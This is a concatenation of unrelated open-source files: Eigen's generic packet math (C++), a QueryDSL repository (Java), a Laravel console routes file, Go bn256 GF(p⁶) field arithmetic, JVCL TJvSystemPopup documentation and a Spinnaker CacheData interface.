template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pxor(const Packet& a, const Packet& b) { return a ^ b; }
/** \internal \returns the bitwise andnot of \a a and \a b */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pandnot(const Packet& a, const Packet& b) { return a & (!b); }
/** \internal \returns a packet version of \a *from, from must be 16 bytes aligned */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pload(const typename unpacket_traits<Packet>::type* from) { return *from; }
/** \internal \returns a packet version of \a *from, (un-aligned load) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
ploadu(const typename unpacket_traits<Packet>::type* from) { return *from; }
/** \internal \returns a packet with constant coefficients \a a, e.g.: (a,a,a,a) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pset1(const typename unpacket_traits<Packet>::type& a) { return a; }
/** \internal \returns a packet with constant coefficients \a a[0], e.g.: (a[0],a[0],a[0],a[0]) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pload1(const typename unpacket_traits<Packet>::type *a) { return pset1<Packet>(*a); }
/** \internal \returns a packet with elements of \a *from duplicated.
* For instance, for a packet of 8 elements, 4 scalars will be read from \a *from and
* duplicated to form: {from[0],from[0],from[1],from[1],from[2],from[2],from[3],from[3]}
* Currently, this function is only used for scalar * complex products.
*/
template<typename Packet> EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Packet
ploaddup(const typename unpacket_traits<Packet>::type* from) { return *from; }
/** \internal \returns a packet with elements of \a *from quadrupled.
* For instance, for a packet of 8 elements, 2 scalars will be read from \a *from and
* replicated to form: {from[0],from[0],from[0],from[0],from[1],from[1],from[1],from[1]}
* Currently, this function is only used in matrix products.
* For packet-size smaller or equal to 4, this function is equivalent to pload1
*/
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
ploadquad(const typename unpacket_traits<Packet>::type* from)
{ return pload1<Packet>(from); }
/** \internal equivalent to
* \code
* a0 = pload1(a+0);
* a1 = pload1(a+1);
* a2 = pload1(a+2);
* a3 = pload1(a+3);
* \endcode
* \sa pset1, pload1, ploaddup, pbroadcast2
*/
template<typename Packet> EIGEN_DEVICE_FUNC
inline void pbroadcast4(const typename unpacket_traits<Packet>::type *a,
Packet& a0, Packet& a1, Packet& a2, Packet& a3)
{
a0 = pload1<Packet>(a+0);
a1 = pload1<Packet>(a+1);
a2 = pload1<Packet>(a+2);
a3 = pload1<Packet>(a+3);
}
/** \internal equivalent to
* \code
* a0 = pload1(a+0);
* a1 = pload1(a+1);
* \endcode
* \sa pset1, pload1, ploaddup, pbroadcast4
*/
template<typename Packet> EIGEN_DEVICE_FUNC
inline void pbroadcast2(const typename unpacket_traits<Packet>::type *a,
Packet& a0, Packet& a1)
{
a0 = pload1<Packet>(a+0);
a1 = pload1<Packet>(a+1);
}
/** \internal \brief Returns a packet with coefficients (a,a+1,...,a+packet_size-1). */
template<typename Packet> EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Packet
plset(const typename unpacket_traits<Packet>::type& a) { return a; }
/** \internal copy the packet \a from to \a *to, \a to must be 16 bytes aligned */
template<typename Scalar, typename Packet> EIGEN_DEVICE_FUNC inline void pstore(Scalar* to, const Packet& from)
{ (*to) = from; }
/** \internal copy the packet \a from to \a *to, (un-aligned store) */
template<typename Scalar, typename Packet> EIGEN_DEVICE_FUNC inline void pstoreu(Scalar* to, const Packet& from)
{ (*to) = from; }
template<typename Scalar, typename Packet> EIGEN_DEVICE_FUNC inline Packet pgather(const Scalar* from, Index /*stride*/)
{ return ploadu<Packet>(from); }
template<typename Scalar, typename Packet> EIGEN_DEVICE_FUNC inline void pscatter(Scalar* to, const Packet& from, Index /*stride*/)
{ pstore(to, from); }
/** \internal tries to do cache prefetching of \a addr */
template<typename Scalar> EIGEN_DEVICE_FUNC inline void prefetch(const Scalar* addr)
{
#ifdef __CUDA_ARCH__
#if defined(__LP64__)
// 64-bit pointer operand constraint for inlined asm
asm(" prefetch.L1 [ %1 ];" : "=l"(addr) : "l"(addr));
#else
// 32-bit pointer operand constraint for inlined asm
asm(" prefetch.L1 [ %1 ];" : "=r"(addr) : "r"(addr));
#endif
#elif (!EIGEN_COMP_MSVC) && (EIGEN_COMP_GNUC || EIGEN_COMP_CLANG || EIGEN_COMP_ICC)
__builtin_prefetch(addr);
#endif
}
/** \internal \returns the first element of a packet */
template<typename Packet> EIGEN_DEVICE_FUNC inline typename unpacket_traits<Packet>::type pfirst(const Packet& a)
{ return a; }
/** \internal \returns a packet where the element i contains the sum of the packet of \a vec[i] */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
preduxp(const Packet* vecs) { return vecs[0]; }
/** \internal \returns the sum of the elements of \a a*/
template<typename Packet> EIGEN_DEVICE_FUNC inline typename unpacket_traits<Packet>::type predux(const Packet& a)
{ return a; }
/** \internal \returns the sum of the elements of \a a by block of 4 elements.
* For a packet {a0, a1, a2, a3, a4, a5, a6, a7}, it returns a half packet {a0+a4, a1+a5, a2+a6, a3+a7}
* For packet-size smaller or equal to 4, this boils down to a noop.
*/
template<typename Packet> EIGEN_DEVICE_FUNC inline
typename conditional<(unpacket_traits<Packet>::size%8)==0,typename unpacket_traits<Packet>::half,Packet>::type
predux_downto4(const Packet& a)
{ return a; }
/** \internal \returns the product of the elements of \a a*/
template<typename Packet> EIGEN_DEVICE_FUNC inline typename unpacket_traits<Packet>::type predux_mul(const Packet& a)
{ return a; }
/** \internal \returns the min of the elements of \a a*/
template<typename Packet> EIGEN_DEVICE_FUNC inline typename unpacket_traits<Packet>::type predux_min(const Packet& a)
{ return a; }
/** \internal \returns the max of the elements of \a a*/
template<typename Packet> EIGEN_DEVICE_FUNC inline typename unpacket_traits<Packet>::type predux_max(const Packet& a)
{ return a; }
/** \internal \returns the reversed elements of \a a*/
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet preverse(const Packet& a)
{ return a; }
/** \internal \returns \a a with real and imaginary part flipped (for complex type only) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet pcplxflip(const Packet& a)
{
return Packet(a.imag(),a.real());
}
/**************************
* Special math functions
***************************/
/** \internal \returns the sine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet psin(const Packet& a) { using std::sin; return sin(a); }
/** \internal \returns the cosine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pcos(const Packet& a) { using std::cos; return cos(a); }
/** \internal \returns the tan of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet ptan(const Packet& a) { using std::tan; return tan(a); }
/** \internal \returns the arc sine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pasin(const Packet& a) { using std::asin; return asin(a); }
/** \internal \returns the arc cosine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pacos(const Packet& a) { using std::acos; return acos(a); }
/** \internal \returns the arc tangent of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet patan(const Packet& a) { using std::atan; return atan(a); }
/** \internal \returns the hyperbolic sine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet psinh(const Packet& a) { using std::sinh; return sinh(a); }
/** \internal \returns the hyperbolic cosine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pcosh(const Packet& a) { using std::cosh; return cosh(a); }
/** \internal \returns the hyperbolic tan of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet ptanh(const Packet& a) { using std::tanh; return tanh(a); }
/** \internal \returns the exp of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pexp(const Packet& a) { using std::exp; return exp(a); }
/** \internal \returns the log of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet plog(const Packet& a) { using std::log; return log(a); }
/** \internal \returns the log1p of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet plog1p(const Packet& a) { return numext::log1p(a); }
/** \internal \returns the log10 of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet plog10(const Packet& a) { using std::log10; return log10(a); }
/** \internal \returns the square-root of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet psqrt(const Packet& a) { using std::sqrt; return sqrt(a); }
/** \internal \returns the reciprocal square-root of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet prsqrt(const Packet& a) {
return pdiv(pset1<Packet>(1), psqrt(a));
}
/** \internal \returns the rounded value of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pround(const Packet& a) { using numext::round; return round(a); }
/** \internal \returns the floor of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pfloor(const Packet& a) { using numext::floor; return floor(a); }
/** \internal \returns the ceil of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pceil(const Packet& a) { using numext::ceil; return ceil(a); }
/***************************************************************************
* The following functions might not have to be overwritten for vectorized types
***************************************************************************/
/** \internal copy a packet with constant coefficient \a a (e.g., [a,a,a,a]) to \a *to. \a to must be 16 bytes aligned */
// NOTE: this function must really be templated on the packet type (think about different packet types for the same scalar type)
template<typename Packet>
inline void pstore1(typename unpacket_traits<Packet>::type* to, const typename unpacket_traits<Packet>::type& a)
{
pstore(to, pset1<Packet>(a));
}
/** \internal \returns a * b + c (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pmadd(const Packet& a,
const Packet& b,
const Packet& c)
{ return padd(pmul(a, b),c); }
/** \internal \returns a packet version of \a *from.
* The pointer \a from must be aligned on a \a Alignment bytes boundary. */
template<typename Packet, int Alignment>
EIGEN_DEVICE_FUNC EIGEN_ALWAYS_INLINE Packet ploadt(const typename unpacket_traits<Packet>::type* from)
{
if(Alignment >= unpacket_traits<Packet>::alignment)
return pload<Packet>(from);
else
return ploadu<Packet>(from);
}
/** \internal copy the packet \a from to \a *to.
* The pointer \a from must be aligned on a \a Alignment bytes boundary. */
template<typename Scalar, typename Packet, int Alignment>
EIGEN_DEVICE_FUNC EIGEN_ALWAYS_INLINE void pstoret(Scalar* to, const Packet& from)
{
if(Alignment >= unpacket_traits<Packet>::alignment)
pstore(to, from);
else
pstoreu(to, from);
}
/** \internal \returns a packet version of \a *from.
* Unlike ploadt, ploadt_ro takes advantage of the read-only memory path on the
* hardware if available to speedup the loading of data that won't be modified
* by the current computation.
*/
template<typename Packet, int LoadMode>
EIGEN_DEVICE_FUNC EIGEN_ALWAYS_INLINE Packet ploadt_ro(const typename unpacket_traits<Packet>::type* from)
{
return ploadt<Packet, LoadMode>(from);
}
/** \internal default implementation of palign() allowing partial specialization */
template<int Offset,typename PacketType>
struct palign_impl
{
// by default data are aligned, so there is nothing to be done :)
static inline void run(PacketType&, const PacketType&) {}
};
/** \internal update \a first using the concatenation of the packet_size minus \a Offset last elements
* of \a first and \a Offset first elements of \a second.
*
* This function is currently only used to optimize matrix-vector products on unaligned matrices.
* It takes 2 packets that represent a contiguous memory array, and returns a packet starting
* at the position \a Offset. For instance, for packets of 4 elements, we have:
* Input:
* - first = {f0,f1,f2,f3}
* - second = {s0,s1,s2,s3}
* Output:
* - if Offset==0 then {f0,f1,f2,f3}
* - if Offset==1 then {f1,f2,f3,s0}
* - if Offset==2 then {f2,f3,s0,s1}
* - if Offset==3 then {f3,s0,s1,s2}
*/
template<int Offset,typename PacketType>
inline void palign(PacketType& first, const PacketType& second)
{
palign_impl<Offset,PacketType>::run(first,second);
}
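// Illustrative sketch (not part of the Eigen API): with a hypothetical 4-wide
// packet type Packet4f over a contiguous float array f[0..7],
//   Packet4f first  = pload<Packet4f>(f);      // {f0,f1,f2,f3}
//   Packet4f second = pload<Packet4f>(f + 4);  // {f4,f5,f6,f7}
//   palign<1>(first, second);                  // first becomes {f1,f2,f3,f4}
// which is how the matrix-vector kernels re-align loads that start off a
// packet boundary.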
/***************************************************************************
* Fast complex products (GCC generates a function call which is very slow)
***************************************************************************/
// Eigen+CUDA does not support complexes.
#ifndef __CUDACC__
template<> inline std::complex<float> pmul(const std::complex<float>& a, const std::complex<float>& b)
{ return std::complex<float>(a.real()*b.real() - a.imag()*b.imag(), a.imag()*b.real() + a.real()*b.imag()); }
template<> inline std::complex<double> pmul(const std::complex<double>& a, const std::complex<double>& b)
{ return std::complex<double>(a.real()*b.real() - a.imag()*b.imag(), a.imag()*b.real() + a.real()*b.imag()); }
#endif
/***************************************************************************
* PacketBlock, that is a collection of N packets where the number of words
* in the packet is a multiple of N.
***************************************************************************/
template <typename Packet,int N=unpacket_traits<Packet>::size> struct PacketBlock {
Packet packet[N];
};
template<typename Packet> EIGEN_DEVICE_FUNC inline void
ptranspose(PacketBlock<Packet,1>& /*kernel*/) {
// Nothing to do in the scalar case, i.e. a 1x1 matrix.
}
/***************************************************************************
* Selector, i.e. vector of N boolean values used to select (i.e. blend)
* words from 2 packets.
***************************************************************************/
template <size_t N> struct Selector {
bool select[N];
};
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pblend(const Selector<unpacket_traits<Packet>::size>& ifPacket, const Packet& thenPacket, const Packet& elsePacket) {
return ifPacket.select[0] ? thenPacket : elsePacket;
}
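// In this generic (scalar) fallback the packet holds a single value, so only
// select[0] is consulted; vectorized specializations blend element-wise.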
/** \internal \returns \a a with the first coefficient replaced by the scalar b */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pinsertfirst(const Packet& a, typename unpacket_traits<Packet>::type b)
{
// Default implementation based on pblend.
// It must be specialized for higher performance.
Selector<unpacket_traits<Packet>::size> mask;
mask.select[0] = true;
// This for loop should be optimized away by the compiler.
for(Index i=1; i<unpacket_traits<Packet>::size; ++i)
mask.select[i] = false;
return pblend(mask, pset1<Packet>(b), a);
}
/** \internal \returns \a a with the last coefficient replaced by the scalar b */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pinsertlast(const Packet& a, typename unpacket_traits<Packet>::type b)
{
// Default implementation based on pblend.
// It must be specialized for higher performance.
Selector<unpacket_traits<Packet>::size> mask;
// This for loop should be optimized away by the compiler.
for(Index i=0; i<unpacket_traits<Packet>::size-1; ++i)
mask.select[i] = false;
mask.select[unpacket_traits<Packet>::size-1] = true;
return pblend(mask, pset1<Packet>(b), a);
}
} // end namespace internal
} // end namespace Eigen
#endif // EIGEN_GENERIC_PACKET_MATH_H
| {
"pile_set_name": "Github"
} |
package com.jojoldu.blogcode.springbootjpa.querydsl.store;
import com.jojoldu.blogcode.springbootjpa.domain.QStore;
import com.jojoldu.blogcode.springbootjpa.domain.Store;
import com.querydsl.jpa.impl.JPAQueryFactory;
import lombok.RequiredArgsConstructor;
import java.util.List;
import static com.jojoldu.blogcode.springbootjpa.domain.QStore.store;
/**
* Created by [email protected] on 03/11/2019
* Blog : http://jojoldu.tistory.com
* Github : http://github.com/jojoldu
*/
@RequiredArgsConstructor
public class StoreQuerydslRepositoryImpl implements StoreQuerydslRepositoryCustom {
private final JPAQueryFactory queryFactory;
@Override
public List<Store> findAllByQuerydsl () {
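// fetchJoin() loads the employees and products collections in the same query
// as the stores, avoiding N+1 selects when they are accessed afterwards.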
return queryFactory.selectFrom(store)
.join(store.employees).fetchJoin()
.join(store.products).fetchJoin()
.fetch();
}
}
| {
"pile_set_name": "Github"
} |
<?php
use Illuminate\Foundation\Inspiring;
use Illuminate\Support\Facades\Artisan;
/*
|--------------------------------------------------------------------------
| Console Routes
|--------------------------------------------------------------------------
|
| This file is where you may define all of your Closure based console
| commands. Each Closure is bound to a command instance allowing a
| simple approach to interacting with each command's IO methods.
|
*/
Artisan::command('inspire', function () {
$this->comment(Inspiring::quote());
})->purpose('Display an inspiring quote');
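// A further closure command could be registered the same way; for example
// (hypothetical, not part of this file):
//
// Artisan::command('greet {name}', function (string $name) {
//     $this->comment("Hello, {$name}!");
// })->purpose('Greet someone by name');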
| {
"pile_set_name": "Github"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package bn256
// For details of the algorithms used, see "Multiplication and Squaring on
// Pairing-Friendly Fields", Devegili et al.
// http://eprint.iacr.org/2006/471.pdf.
import (
"math/big"
)
// gfP6 implements the field of size p⁶ as a cubic extension of gfP2 where τ³=ξ
// and ξ=i+3.
type gfP6 struct {
x, y, z *gfP2 // value is xτ² + yτ + z
}
func newGFp6(pool *bnPool) *gfP6 {
return &gfP6{newGFp2(pool), newGFp2(pool), newGFp2(pool)}
}
func (e *gfP6) String() string {
return "(" + e.x.String() + "," + e.y.String() + "," + e.z.String() + ")"
}
func (e *gfP6) Put(pool *bnPool) {
e.x.Put(pool)
e.y.Put(pool)
e.z.Put(pool)
}
func (e *gfP6) Set(a *gfP6) *gfP6 {
e.x.Set(a.x)
e.y.Set(a.y)
e.z.Set(a.z)
return e
}
func (e *gfP6) SetZero() *gfP6 {
e.x.SetZero()
e.y.SetZero()
e.z.SetZero()
return e
}
func (e *gfP6) SetOne() *gfP6 {
e.x.SetZero()
e.y.SetZero()
e.z.SetOne()
return e
}
func (e *gfP6) Minimal() {
e.x.Minimal()
e.y.Minimal()
e.z.Minimal()
}
func (e *gfP6) IsZero() bool {
return e.x.IsZero() && e.y.IsZero() && e.z.IsZero()
}
func (e *gfP6) IsOne() bool {
return e.x.IsZero() && e.y.IsZero() && e.z.IsOne()
}
func (e *gfP6) Negative(a *gfP6) *gfP6 {
e.x.Negative(a.x)
e.y.Negative(a.y)
e.z.Negative(a.z)
return e
}
func (e *gfP6) Frobenius(a *gfP6, pool *bnPool) *gfP6 {
e.x.Conjugate(a.x)
e.y.Conjugate(a.y)
e.z.Conjugate(a.z)
e.x.Mul(e.x, xiTo2PMinus2Over3, pool)
e.y.Mul(e.y, xiToPMinus1Over3, pool)
return e
}
// FrobeniusP2 computes (xτ²+yτ+z)^(p²) = xτ^(2p²) + yτ^(p²) + z
func (e *gfP6) FrobeniusP2(a *gfP6) *gfP6 {
// τ^(2p²) = τ²τ^(2p²-2) = τ²ξ^((2p²-2)/3)
e.x.MulScalar(a.x, xiTo2PSquaredMinus2Over3)
// τ^(p²) = ττ^(p²-1) = τξ^((p²-1)/3)
e.y.MulScalar(a.y, xiToPSquaredMinus1Over3)
e.z.Set(a.z)
return e
}
func (e *gfP6) Add(a, b *gfP6) *gfP6 {
e.x.Add(a.x, b.x)
e.y.Add(a.y, b.y)
e.z.Add(a.z, b.z)
return e
}
func (e *gfP6) Sub(a, b *gfP6) *gfP6 {
e.x.Sub(a.x, b.x)
e.y.Sub(a.y, b.y)
e.z.Sub(a.z, b.z)
return e
}
func (e *gfP6) Double(a *gfP6) *gfP6 {
e.x.Double(a.x)
e.y.Double(a.y)
e.z.Double(a.z)
return e
}
func (e *gfP6) Mul(a, b *gfP6, pool *bnPool) *gfP6 {
// "Multiplication and Squaring on Pairing-Friendly Fields"
// Section 4, Karatsuba method.
// http://eprint.iacr.org/2006/471.pdf
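// With a = a.x·τ² + a.y·τ + a.z (and b likewise), the three "diagonal"
// products v0 = a.z·b.z, v1 = a.y·b.y and v2 = a.x·b.x are computed once; the
// cross terms are recovered from sums of the form (a.i+a.j)(b.i+b.j), and
// τ³ = ξ folds the high-degree terms back into the τ², τ and constant
// coefficients (tx, ty, tz below).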
v0 := newGFp2(pool)
v0.Mul(a.z, b.z, pool)
v1 := newGFp2(pool)
v1.Mul(a.y, b.y, pool)
v2 := newGFp2(pool)
v2.Mul(a.x, b.x, pool)
t0 := newGFp2(pool)
t0.Add(a.x, a.y)
t1 := newGFp2(pool)
t1.Add(b.x, b.y)
tz := newGFp2(pool)
tz.Mul(t0, t1, pool)
tz.Sub(tz, v1)
tz.Sub(tz, v2)
tz.MulXi(tz, pool)
tz.Add(tz, v0)
t0.Add(a.y, a.z)
t1.Add(b.y, b.z)
ty := newGFp2(pool)
ty.Mul(t0, t1, pool)
ty.Sub(ty, v0)
ty.Sub(ty, v1)
t0.MulXi(v2, pool)
ty.Add(ty, t0)
t0.Add(a.x, a.z)
t1.Add(b.x, b.z)
tx := newGFp2(pool)
tx.Mul(t0, t1, pool)
tx.Sub(tx, v0)
tx.Add(tx, v1)
tx.Sub(tx, v2)
e.x.Set(tx)
e.y.Set(ty)
e.z.Set(tz)
t0.Put(pool)
t1.Put(pool)
tx.Put(pool)
ty.Put(pool)
tz.Put(pool)
v0.Put(pool)
v1.Put(pool)
v2.Put(pool)
return e
}
func (e *gfP6) MulScalar(a *gfP6, b *gfP2, pool *bnPool) *gfP6 {
e.x.Mul(a.x, b, pool)
e.y.Mul(a.y, b, pool)
e.z.Mul(a.z, b, pool)
return e
}
func (e *gfP6) MulGFP(a *gfP6, b *big.Int) *gfP6 {
e.x.MulScalar(a.x, b)
e.y.MulScalar(a.y, b)
e.z.MulScalar(a.z, b)
return e
}
// MulTau computes τ·(aτ²+bτ+c) = bτ²+cτ+aξ
func (e *gfP6) MulTau(a *gfP6, pool *bnPool) {
tz := newGFp2(pool)
tz.MulXi(a.x, pool)
ty := newGFp2(pool)
ty.Set(a.y)
e.y.Set(a.z)
e.x.Set(ty)
e.z.Set(tz)
tz.Put(pool)
ty.Put(pool)
}
func (e *gfP6) Square(a *gfP6, pool *bnPool) *gfP6 {
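// Squaring follows the same interpolation pattern as Mul with b = a, so the
// three squares v0, v1, v2 replace the pairwise products.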
v0 := newGFp2(pool).Square(a.z, pool)
v1 := newGFp2(pool).Square(a.y, pool)
v2 := newGFp2(pool).Square(a.x, pool)
c0 := newGFp2(pool).Add(a.x, a.y)
c0.Square(c0, pool)
c0.Sub(c0, v1)
c0.Sub(c0, v2)
c0.MulXi(c0, pool)
c0.Add(c0, v0)
c1 := newGFp2(pool).Add(a.y, a.z)
c1.Square(c1, pool)
c1.Sub(c1, v0)
c1.Sub(c1, v1)
xiV2 := newGFp2(pool).MulXi(v2, pool)
c1.Add(c1, xiV2)
c2 := newGFp2(pool).Add(a.x, a.z)
c2.Square(c2, pool)
c2.Sub(c2, v0)
c2.Add(c2, v1)
c2.Sub(c2, v2)
e.x.Set(c2)
e.y.Set(c1)
e.z.Set(c0)
v0.Put(pool)
v1.Put(pool)
v2.Put(pool)
c0.Put(pool)
c1.Put(pool)
c2.Put(pool)
xiV2.Put(pool)
return e
}
func (e *gfP6) Invert(a *gfP6, pool *bnPool) *gfP6 {
// See "Implementing cryptographic pairings", M. Scott, section 3.2.
// ftp://136.206.11.249/pub/crypto/pairings.pdf
// Here we can give a short explanation of how it works: let j be a cubic root of
// unity in GF(p²) so that 1+j+j²=0.
// Then (xτ² + yτ + z)(xj²τ² + yjτ + z)(xjτ² + yj²τ + z)
// = (xτ² + yτ + z)(Cτ²+Bτ+A)
// = (x³ξ²+y³ξ+z³-3ξxyz) = F is an element of the base field (the norm).
//
// On the other hand (xj²τ² + yjτ + z)(xjτ² + yj²τ + z)
// = τ²(y²-ξxz) + τ(ξx²-yz) + (z²-ξxy)
//
// So that's why A = (z²-ξxy), B = (ξx²-yz), C = (y²-ξxz)
t1 := newGFp2(pool)
A := newGFp2(pool)
A.Square(a.z, pool)
t1.Mul(a.x, a.y, pool)
t1.MulXi(t1, pool)
A.Sub(A, t1)
B := newGFp2(pool)
B.Square(a.x, pool)
B.MulXi(B, pool)
t1.Mul(a.y, a.z, pool)
B.Sub(B, t1)
C := newGFp2(pool)
C.Square(a.y, pool)
t1.Mul(a.x, a.z, pool)
C.Sub(C, t1)
F := newGFp2(pool)
F.Mul(C, a.y, pool)
F.MulXi(F, pool)
t1.Mul(A, a.z, pool)
F.Add(F, t1)
t1.Mul(B, a.x, pool)
t1.MulXi(t1, pool)
F.Add(F, t1)
F.Invert(F, pool)
e.x.Mul(C, F, pool)
e.y.Mul(B, F, pool)
e.z.Mul(A, F, pool)
t1.Put(pool)
A.Put(pool)
B.Put(pool)
C.Put(pool)
F.Put(pool)
return e
}
| {
"pile_set_name": "Github"
} |
##Package: StdCtrls
##Status: Completed (I)
----------------------------------------------------------------------------------------------------
@@JvSystemPopup.pas
Summary
Contains the TJvSystemPopup component.
Author
Sébastien Buysse
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.PositionInMenu
Summary
Specifies where in the system menu the popup menu items are inserted.
Description
Use PositionInMenu to specify whether the menu items of the popup menu specified by Popup are
inserted at the top of the system menu or at the bottom.
See Also
TJvSystemPopup.Position
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Position
Summary
Specifies in which system menu the popup menu items are inserted.
Description
Use Position to specify whether the popup menu is inserted in the form's system menu, the
application's system menu, or isn't inserted at all.
These are the possible values of Position:
<TABLE>
Value Meaning
------------- ---------------------------------------------------------------------------
ppNone The popup menu isn't inserted in a system menu.
ppForm The popup menu is inserted in the system menu of the form. Access this
system menu by right-clicking on the form's title bar.
ppApplication The popup menu is inserted in the system menu of the application. Access
this system menu by right-clicking the window button on the taskbar that
is associated with the application.
</TABLE>
See Also
TJvSystemPopup.Popup, TJvSystemPopup.PositionInMenu
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Popup
Summary
Identifies a pop-up menu associated with the component.
Description
Use Popup to associate a pop-up menu with TJvSystemPopup. The component adds the menu items of the
pop-up menu to the system menu.
See Also
TJvSystemPopup.Position
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Notification
Summary
Responds to notifications when objects are about to be created or destroyed.
Description
Notification is called automatically when components are created or destroyed. After calling the
inherited method, Notification checks whether the component specified by the Popup property is
about to be destroyed. If the component is going away, Notification sets the Popup property to nil.
Parameters
AComponent - Identifies the component that is about to be created or destroyed.
Operation - Specifies whether the component is about to be created or destroyed.
See Also
TJvSystemPopup.Popup
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Destroy
Summary
Destroys an instance of TJvSystemPopup
Description
Do not call Destroy directly in an application. Instead, call Free. Free verifies that the
TJvSystemPopup object is not nil and only then calls Destroy.
See Also
TJvSystemPopup.Create
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Create
Summary
Creates and initializes a new TJvSystemPopup object.
Description
Use \Create to create and initialize a new TJvSystemPopup object.
\Create calls the inherited \Create method, then sets the initial values for the component as
follows:
* Position is set to ppNone.
* PositionInMenu is set to pmTop.
Parameters
AOwner - A component, typically the form, that is responsible for freeing the component.
See Also
TJvSystemPopup.Position, TJvSystemPopup.PositionInMenu
----------------------------------------------------------------------------------------------------
@@TJvPositionInMenu.pmBottom
Inserts the menu items of the popup menu at the bottom of the system menu.
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup
<TITLEIMG TJvSystemPopup>
#JVCLInfo
<GROUP JVCL.FormsAndApp.Application>
<FLAG Component>
Summary
Adds menu items to the system menu.
Description
Use TJvSystemPopup to add menu items to the system menu (also known as the window menu or the
control menu).
Use Popup to associate a pop-up menu with TJvSystemPopup. TJvSystemPopup adds the menu items of the
pop-up menu to the system menu.
Use Position to specify whether the popup menu is inserted in the form's system menu, the
application's system menu, or isn't inserted at all. Use PositionInMenu to specify where the menu
items are inserted in the system menu: at the bottom or at the top.
----------------------------------------------------------------------------------------------------
@@TJvPositionInMenu
<TITLE TJvPositionInMenu type>
Summary
Represents different kinds of positions in a system menu.
Description
Use the TJvPositionInMenu type to specify a position in a system menu.
----------------------------------------------------------------------------------------------------
@@TJvPositionInMenu.pmTop
Inserts the menu items of the popup menu at the top of the system menu.
----------------------------------------------------------------------------------------------------
@@TJvSystemPopup.Refresh
Summary
Refreshes the system menu.
Description
Call Refresh to refresh the system menu. Refresh resets the window menu back to the default state.
Parameters
SystemReset - Specifies whether to reset the system menu.
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2014 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.spinnaker.cats.cache;
import com.netflix.spinnaker.kork.annotations.Beta;
import java.util.Collection;
import java.util.Map;
/**
* CacheData is stored in a Cache. Attributes are facts about the CacheData that can be updated by
* CachingAgents. Relationships are links to other CacheData.
*
* <p>Note: Not all caches may support a per record ttl
*/
@Beta
public interface CacheData {
String getId();
/** @return The ttl (in seconds) for this CacheData */
int getTtlSeconds();
Map<String, Object> getAttributes();
/**
* @return relationships for this CacheData, keyed by type returning a collection of ids for that
* type
*/
Map<String, Collection<String>> getRelationships();
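// For example, a server group's CacheData might expose relationships such as
// {"instances": [...ids...], "loadBalancers": [...ids...]} - ids grouped by type.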
}
| {
